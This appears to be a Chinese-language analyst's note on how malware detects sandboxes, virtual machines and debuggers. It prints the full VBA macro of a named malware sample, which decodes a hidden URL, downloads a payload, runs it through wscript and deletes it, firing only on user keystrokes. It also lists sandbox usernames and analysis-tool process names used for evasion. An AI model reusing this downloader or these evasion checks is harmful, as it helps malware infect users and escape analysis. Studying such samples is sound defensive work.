沙箱

特殊进程名,模块名,路径\文件名

特殊行为(本文主要记录)

硬件

通过这种利用正常宿主环境与沙箱环境间的差异细节进行沙箱判定,以鉴别自身是否运行在沙箱等分析环境中。通过利用虚拟机等环境在硬件上与真实环境的区别,保证执行环境的安全。

  • 检测到鼠标等外设的存在

  • 是否可以播放声音

    动作

    鼠标

  • 移动

  • 点击

    键盘

    窗口

    输入

    需要输入(甚至是规定的值)才能触发继续执行逻辑。
    样本8DE75256D0E579416263CB3C61FC6C55
    宏代码
    ```python Declare PtrSafe Sub Sleep Lib \”kernel32.dll\” (ByVal Milliseconds As Integer) Declare PtrSafe Sub WinExec Lib \”kernel32.dll\” (ByVal cmd As String, ByVal opcode As Integer) Declare PtrSafe Function CreateFileA Lib \”kernel32.dll\” (ByVal FileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long Declare PtrSafe Function WriteFile Lib \”kernel32.dll\” (ByVal hFile As Long, ByVal lpBuffer As String, ByVal nNumberOfBytesToWrite As Long, ByVal lpNumberOfBytesWritten As LongPtr, ByVal lpOverlapped As Long) As Long Declare PtrSafe Function CloseHandle Lib \”kernel32.dll\” (ByVal hObject As Integer) As Long Declare PtrSafe Function DeleteFileA Lib \”kernel32.dll\” (ByVal lpFileName As String) As Long Declare PtrSafe Function CopyFileA Lib \”kernel32.dll\” (ByVal Src As String, ByVal Dest As String, ByVal opcode As Integer) As Long Declare PtrSafe Function SHGetSpecialFolderPathA Lib \”shell32.dll\” (ByVal hwndOwner As Long, ByVal lpszPath As String, ByVal nFolder As Long, ByVal fCreate As Long) As Long

//执行标志位 Dim qazwsx As Integer

Sub AutoOpen() On Error Resume Next qazwsx = 0 End Sub

Function sfjksfdgasdfhefgh(data) On Error Resume Next sfjksfdgasdfhefgh = afghhha(data) End Function

Function afghhha(ByVal base64String) Const Base64 = \”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\” Dim dataLength, sOut, groupBegin

  1. base64String = Replace(base64String, vbCrLf, \"\")
  2. base64String = Replace(base64String, vbTab, \"\")
  3. base64String = Replace(base64String, \" \", \"\")
  4. dataLength = Len(base64String)
  6. For groupBegin = 1 To dataLength Step 4
  7.     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  8.     numDataBytes = 3
  9.     nGroup = 0
  11.     For CharCounter = 0 To 3
  12.         thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  14.         If thisChar = \"=\" Then
  15.             numDataBytes = numDataBytes - 1
  16.             thisData = 0
  17.         Else
  18.             thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
  19.         End If
  21.         If thisData = -1 Then
  22.             Err.Raise 2, \"Base64Decode\", \"Bad character In Base64 string.\"
  23.             Exit Function
  24.         End If
  26.         nGroup = 64 * nGroup + thisData
  27.     Next
  28.     nGroup = Hex(nGroup)
  29.     nGroup = String(6 - Len(nGroup), \"0\") & nGroup
  30.     pOut = Chr(CByte(\"&H\" & Mid(nGroup, 1, 2))) + _
  31.             Chr(CByte(\"&H\" & Mid(nGroup, 3, 2))) + _
  32.             Chr(CByte(\"&H\" & Mid(nGroup, 5, 2)))
  33.     sOut = sOut & Left(pOut, numDataBytes)
  34. Next
  35. afghhha = sOut

End Function

Function gjhmksfghsdfgs(file, data) On Error Resume Next DeleteFileA file Dim fs As Long fs = CreateFileA(file, 268435456, 1, 0, 4, 0, 0) If (fs <> -1) Then Dim point As Long ddd = VarPtr(point) WriteFile fs, data, Len(data), ddd, 0 CloseHandle fs End If End Function

Function ughjesrh56hdsf(nFolder As Long) As String On Error Resume Next Const MAX_PATH = 260 Dim strBuffer As String strBuffer = Space$(MAX_PATH) SHGetSpecialFolderPathA 0, strBuffer, nFolder, 0 ughjesrh56hdsf = Left$(strBuffer, InStr(strBuffer, vbNullChar) - 1) End Function

Function ujmikl() On Error Resume Next If (qazwsx = 0) Then On Error Resume Next Dim fhjk As String Dim aksjdfhashdf As String Dim fgjtgksdfhw As String

  1.     ini = ughjesrh56hdsf(26) & \"\\OneD\" & \"river.exe\"
  3.     Set wob = CreateObject(\"wscript.shell\")
  4.     //http://1213rt.atwebpages.com/cohb/d.php?filename=corona
  5.     drl = sfjksfdgasdfhefgh(\"aHR0cDovLzEyMTNydC5hdHdlYnBhZ2VzLmNvbS9jb2hiL2QucGhwP2ZpbGVuYW1lPWNvcm9uYQ==\")
  6.     Set WinHttpReq = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")
  7.     WinHttpReq.Open \"GET\", drl, False
  8.     WinHttpReq.send
  10.     If WinHttpReq.Status = 200 Then
  11.         gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
  12.         //System32 wscript.exe //e:vbscript //b ini
  13.         str10 = ughjesrh56hdsf(36) & \"\\Syst\" & \"em3\" & \"2\\ws\" & \"cript.exe\" & \" \" & \"//e:v\" & \"bs\" & \"cri\" & \"pt //b \" & \"\"\"\" & ini & \"\"\"\"
  14.         //运行
  15.         WinExec str10, 0
  16.         Sleep 2000
  17.         //删除
  18.         DeleteFileA ini
  19.     End If
  20.     qazwsx = 1

End If End Function

Sub FLL() Selection.TypeText Text:=\”a\” ujmikl End Sub

Sub G9W() Selection.TypeText Text:=\”b\” ujmikl End Sub

Sub GEA() Selection.TypeText Text:=\”c\” ujmikl End Sub

Sub GJA() Selection.TypeText Text:=\”d\” ujmikl End Sub

Sub HFG() Selection.TypeText Text:=\”e\” ujmikl End Sub

Sub HMD() Selection.TypeText Text:=\”f\” ujmikl End Sub

Sub IWE() Selection.TypeText Text:=\”i\” ujmikl End Sub

Sub JFG() Selection.TypeText Text:=\”j\” ujmikl End Sub

Sub JGL() Selection.TypeText Text:=\”k\” ujmikl End Sub

Sub JGY() Selection.TypeText Text:=\”l\” ujmikl End Sub

Sub JNF() Selection.TypeText Text:=\”m\” ujmikl End Sub

Sub KFG() Selection.TypeText Text:=\”n\” ujmikl End Sub

Sub KGH() Selection.TypeText Text:=\”o\” ujmikl End Sub

Sub KJE() Selection.TypeText Text:=\”p\” ujmikl End Sub

Sub KSA() Selection.TypeText Text:=\”q\” ujmikl End Sub

Sub KYP() Selection.TypeText Text:=\”r\” ujmikl End Sub

Sub SLK() Selection.TypeText Text:=\”t\” ujmikl End Sub

Sub THS() Selection.TypeText Text:=\”u\” ujmikl End Sub

Sub W3I() Selection.TypeText Text:=\”v\” ujmikl End Sub

Sub WSE() Selection.TypeText Text:=\”w\” ujmikl End Sub

Sub ASN() Selection.TypeText Text:=\”y\” ujmikl End Sub

Sub DF8() Selection.TypeText Text:=\”z\” ujmikl End Sub

Sub IHI() Selection.TypeText Text:=\”h\” ujmikl End Sub

Sub AKS() Selection.TypeText Text:=\”x\” ujmikl End Sub

Sub HSL() Selection.TypeText Text:=\”g\” ujmikl End Sub

Sub ESH() Selection.TypeText Text:=\”1\” ujmikl End Sub

Sub F8G() Selection.TypeText Text:=\”2\” ujmikl End Sub

Sub FDG() Selection.TypeText Text:=\”3\” ujmikl End Sub

Sub FGH() Selection.TypeText Text:=\”4\” ujmikl End Sub

Sub FGJ() Selection.TypeText Text:=\”5\” ujmikl End Sub

Sub FGM() Selection.TypeText Text:=\”6\” ujmikl End Sub

Sub FGU() Selection.TypeText Text:=\”7\” ujmikl End Sub

Sub FJG() Selection.TypeText Text:=\”8\” ujmikl End Sub

Sub FKJ() Selection.TypeText Text:=\”9\” ujmikl End Sub

Sub ERH() Selection.TypeText Text:=\”0\” ujmikl End Sub

Sub JTO() Selection.TypeText Text:=\”-\” ujmikl End Sub

Sub KJP() Selection.TypeText Text:=\”=\” ujmikl End Sub

Sub G8I() Selection.TypeBackspace ujmikl End Sub

Sub JHL() Selection.TypeText Text:=\”[\” End Sub

Sub LDK() Selection.TypeText Text:=\”\” End Sub

Sub G9Y() Selection.TypeText Text:=\”B\” ujmikl End Sub

Sub GJL() Selection.TypeText Text:=\”D\” ujmikl End Sub

Sub HIT() Selection.TypeText Text:=\”E\” ujmikl End Sub

Sub HSJ() Selection.TypeText Text:=\”F\” ujmikl End Sub

Sub IER() Selection.TypeText Text:=\”G\” ujmikl End Sub

Sub IRJ() Selection.TypeText Text:=\”H\” ujmikl End Sub

Sub JFB() Selection.TypeText Text:=\”I\” ujmikl End Sub

Sub JGK() Selection.TypeText Text:=\”J\” ujmikl End Sub

Sub JGS() Selection.TypeText Text:=\”K\” ujmikl End Sub

Sub JLA() Selection.TypeText Text:=\”L\” ujmikl End Sub

Sub KDJ() Selection.TypeText Text:=\”M\” ujmikl End Sub

Sub KFJ() Selection.TypeText Text:=\”N\” ujmikl End Sub

Sub KRO() Selection.TypeText Text:=\”P\” ujmikl End Sub

Sub KUJ() Selection.TypeText Text:=\”Q\” ujmikl End Sub

Sub LKF() Selection.TypeText Text:=\”R\” ujmikl End Sub

Sub REI() Selection.TypeText Text:=\”S\” ujmikl End Sub

Sub TGS() Selection.TypeText Text:=\”T\” ujmikl End Sub

Sub UIG() Selection.TypeText Text:=\”U\” ujmikl End Sub

Sub WGY() Selection.TypeText Text:=\”V\” ujmikl End Sub

Sub YGA() Selection.TypeText Text:=\”W\” ujmikl End Sub

Sub ASJ() Selection.TypeText Text:=\”X\” ujmikl End Sub

Sub BKS() Selection.TypeText Text:=\”Y\” ujmikl End Sub

Sub DFJ() Selection.TypeText Text:=\”Z\” ujmikl End Sub

Sub FUE() Selection.TypeText Text:=\”A\” ujmikl End Sub

Sub KJD() Selection.TypeText Text:=\”O\” ujmikl End Sub

Sub QWE() Selection.TypeText Text:=\”\\” ujmikl End Sub

Sub KUY() Selection.TypeText Text:=\”;\” ujmikl End Sub

Sub SWR() Selection.TypeText Text:=\”‘\” ujmikl End Sub

Sub GIR() Selection.TypeText Text:=\”,\” ujmikl End Sub

Sub GLS() Selection.TypeText Text:=\”.\” ujmikl End Sub

Sub GAL() Selection.TypeText Text:=\”/\” ujmikl End Sub

Sub LSK() Selection.TypeText Text:=\”@\” ujmikl End Sub

Sub MLD() Selection.TypeText Text:=\”#\” ujmikl End Sub

Sub MNA() Selection.TypeText Text:=\”$\” ujmikl End Sub

Sub MND() Selection.TypeText Text:=\”%\” ujmikl End Sub

Sub NLD() Selection.TypeText Text:=\”^\” ujmikl End Sub

Sub OHW() Selection.TypeText Text:=\”&\” ujmikl End Sub

Sub OJE() Selection.TypeText Text:=\”*\” ujmikl End Sub

Sub OYJ() Selection.TypeText Text:=\”(\” ujmikl End Sub

Sub LKS0() Selection.TypeText Text:=\”)\” ujmikl End Sub

Sub RUI() Selection.TypeText Text:=\”_\” ujmikl End Sub

Sub RLK() Selection.TypeText Text:=\”+\” ujmikl End Sub

Sub RTJ() Selection.TypeText Text:=\”{\” ujmikl End Sub

Sub SFG() Selection.TypeText Text:=\”}\” ujmikl End Sub

Sub SKD() Selection.TypeText Text:=\”|\” ujmikl End Sub

Sub SDL() Selection.TypeText Text:=\”:\” ujmikl End Sub

Sub SLD() Selection.TypeText Text:=\”\”\”\” End Sub

Sub RGH() Selection.TypeText Text:=\”<\” ujmikl End Sub

Sub RJG() Selection.TypeText Text:=\”>\” ujmikl End Sub

Sub RFU() Selection.TypeText Text:=\”?\” ujmikl End Sub

Sub LKS() Selection.TypeText Text:=\”s\” ujmikl End Sub

Sub LQW() Selection.TypeText Text:=\”!\” ujmikl End Sub

Sub GFN() Selection.TypeText Text:=\”C\” End Sub

Sub GKJ() Selection.Delete Unit:=wdCharacter, Count:=1 ujmikl End Sub

Sub ISE() Selection.HomeKey Unit:=wdLine ujmikl End Sub

Sub HLK() Selection.EndKey Unit:=wdLine ujmikl End Sub

Sub KJG() Selection.MoveUp Unit:=wdScreen, Count:=1 ujmikl End Sub

Sub TWQ() Selection.MoveUp Unit:=wdLine, Count:=1 ujmikl End Sub

Sub GQU() Selection.MoveDown Unit:=wdLine, Count:=1 ujmikl End Sub

Sub JKG() Selection.MoveLeft Unit:=wdCharacter, Count:=1 ujmikl End Sub

Sub LKD() Selection.MoveRight Unit:=wdCharacter, Count:=1 ujmikl End Sub

Sub vfdc() Selection.Paste ujmikl End Sub

Sub vfdds() Selection.Paste ujmikl End Sub

  1. <a name="g2I3O"></a>
  2. ###### 函数/方法
  3. Selection.TypeText<br />    Selection.[按键/鼠标移动]
  4. <a name="DFQvd"></a>
  5. # 虚拟机
  6. <a name="LmEYY"></a>
  7. ## 真实硬件状态
  8. 例如硬盘大小,内存大小,CPU风扇,型号,BIOS序列号名称,电源电压,温度等等
  9. <a name="aSPue"></a>
  10. ## 虚拟机环境
  11. 用户名、主机名等:

15pb、7man2、stella、f4kh9od、willcarter、biluta、ehwalker、hong lee、joe cage、jonathan、kindsight、malware、peter miller、petermiller、phil、rapit、r0b0t、cuckoo、vm-pc、analyze、roslyn、vince、test、sample、mcafee、vmscan、mallab、abby、elvis、wilbert、joe smith、hanspeter、johnson、placehole、tequila、paggy sue、klone、oliver、stevens、ieuser、virlab、beginer、beginner、markos、semims、gregory、tom-pc、will carter、angelica、eric johns、john ca、lebron james、rats-pc、robot、serena、sofynia、straz、bea-ch

  1. <a name="sY0Ew"></a>
  2. ### 🤣🤣🤣15PB🤣🤣🤣
  3. 甚至出现了我国知名二进制逆向培训公司“[15PB](http://www.15pb.com.cn)”:<br />![image.png](https://cdn.nlark.com/yuque/0/2021/png/1632223/1621585437526-15daf219-f188-4e16-9d9f-4123e6f48c2e.png#clientId=ubefe1b63-2c84-4&from=paste&height=162&id=ORIcb&originHeight=162&originWidth=1384&originalType=binary&ratio=1&rotation=0&showTitle=false&size=157109&status=done&style=none&taskId=u8feed876-e969-4450-a57c-b6b02786291&title=&width=1384)
  4. <a name="rWc5b"></a>
  5. ### Virtual Box
  6. <a name="a8nQn"></a>
  7. #### 检测文件
  8. VBoxMouse.sys等
  9. <a name="qBYXG"></a>
  10. #### 注册表
  11. VirtualBox Guest Additions directory等
  12. <a name="j3vtd"></a>
  13. #### 进程
  14. VBoxControl.exe等
  15. <a name="foh3y"></a>
  16. #### 服务
  17. VBoxService等
  18. <a name="icp6s"></a>
  19. #### 硬件
  20. MAC地址等
  21. <a name="WggIA"></a>
  22. # 调试
  23. <a name="eJ5ke"></a>
  24. ## 调试器
  26. - 基本的例如 IsDebuggerPresent API ,PEB.BeingDebugged...
  27. - TLS 回调
  28. - hard/software breakpoints
  29. - VirtualAlloc
  30. <a name="B6UfH"></a>
  31. ## 分析工具
  32. 分析工具进程检测,主要都是一些和虚拟环境,逆向,病毒分析,二进制,编程有关的软件:

python、vmacthlp、VGAuthService、vmtoolsd、TPAutoConnSvc、ftnlsv、ftscanmgrhv、vmwsprrdpwks、usbarbitrator、horizon_client_service、ProcessHacker、procexp、Autoruns、pestudio、Wireshark、dumpcap、TSVNCache、dnSpy、ConEmu、010Editor、ida64、Procmon、ollydbg、LordPE、Fiddler、CFF Explorer、sample、vboxservice、vboxtray ```